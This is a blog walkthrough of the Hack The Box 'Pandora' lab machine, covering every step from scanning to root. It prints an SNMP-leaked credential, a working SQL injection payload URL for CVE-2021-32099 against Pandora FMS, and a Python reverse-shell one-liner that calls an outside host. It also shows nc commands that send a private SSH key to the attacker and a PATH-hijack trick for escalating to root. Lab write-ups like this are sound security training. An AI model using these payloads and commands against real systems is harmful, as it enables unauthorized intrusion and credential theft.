Posts Pandora HTB Walkthrough
Post
Cancel

Pandora HTB Walkthrough

Posted Mar 30 2022-03-30T15:35:07+02:00 by Mohamed Ezzat

Machine Info

  • OS: Linux
  • Difficulty: Easy
  • Points: 20
  • Release: 08 Jan 2022
  • IP: 10.10.11.136

Network Scanning

We start with using nmap for scanning and the tcp scan gives us two open ports ssh:22 and http:80. We check the website that is running on port 80 and after awhile of checking it, we find nothing interesting to us.

1

nmap -p- -A -T4 10.10.11.136

nmap

After thinking for awhile, why we don’t give try to udp scan. Therefore, we use nmap for udp scan and it gives us bunch of filtered/open ports but the one that seems interesting to us is snmp:161 and its version is SNMNPv1 which has no security feature.

1

nmap -sU -A -T4 10.10.11.136

nmap

Enumeration

Looking at snmp-processes, we find that there is a credential used before “daniel:HotelBabylon23”. Also, we can find that credential by using snmpwalk.

nmap

Exploitation

We try to use that credential to login to ssh and it works.

1

ssh daniel@panda.htb

ssh

We check for any other system users and we found “matt” user. We need to escalate our privileges to that user to get user flag.

etc_passwd

Privilege Escalation

User Matt

We run linpeas and we find another website that is running locally on port 80.

linpeas

Therefore, we need to conduct ssh local port forwarding to access that internal service.

1

ssh -L 80:127.0.0.1:80 daniel@panda.htb

local_port_forwarding

Checking the website, it uses Pandora FMS v7.0NG.742. We try to use “daniel:HotelBabylon23” to login but it didn’t work. We found that blog CVE-2021-32099 explains how to gain access as admin through unauthenticated SQL injection and here CVE-2021-32099_Payload is the payload used to gain access.

1

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

unauthenticated_access admin_access

Then, we tried to figure out how to upload a shell or backdoor but we couldn’t. So, we google it and we found that script CVE-2021-32099 Pandora_v7.0NG.742 helps us to take an interactive shell.Then, We establish a fully interactive shell and got the user flag.

1
2
3

./sqlpwn.py -t 127.0.0.1
nc -nlvp 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

shell full_shell

Root

Again we use linpeas and we found SUID binary called “pandora_backup”. We download it to our local machine to ivestigate it and while using strings we found that it uses tar binary with a relative path. So, We can create our malicious tar binary and prepend its path to $PATH environment variable.

1

strings pandora_backup

linpeas strings

We tried to apply the above mentioned approach to escalate our privileges to root without login through ssh as matt and it didn’t work. Therefore, we create a ssh key and then login to ssh as matt.

1
2
3
4
5
6
7
8
9
10
11

#On victim machine
ssh-keygen
cd /home/matt/.ssh
cat id_rsa.pub > authorized_keys
chmod 600 authorized_keys
nc 10.10.16.13 9999 < id_rsa

#On local machine
nc -nlvp 9999 > id_rsa
chmod 600 id_rsa
ssh matt@panda.htb -i id_rsa

ssh_keygen ssh

Then, we creat our malicious tar binary that executes bash session as root and prepend its path to $PATH environment variable. Now, we run pandora_backup and we got root access.

1
2
3
4
5
6
7
8

cd /tmp
echo '/bin/bash' > tar
chmod +x tar
export PATH=/tmp:$PATH
./pandora_backup
id
cd /root
cat root.txt

root

Hack The Box
htb boot2root ethical hacking
This post is licensed under CC BY 4.0 by the author.
Contents

Academy HTB Walkthrough

Late HTB Walkthrough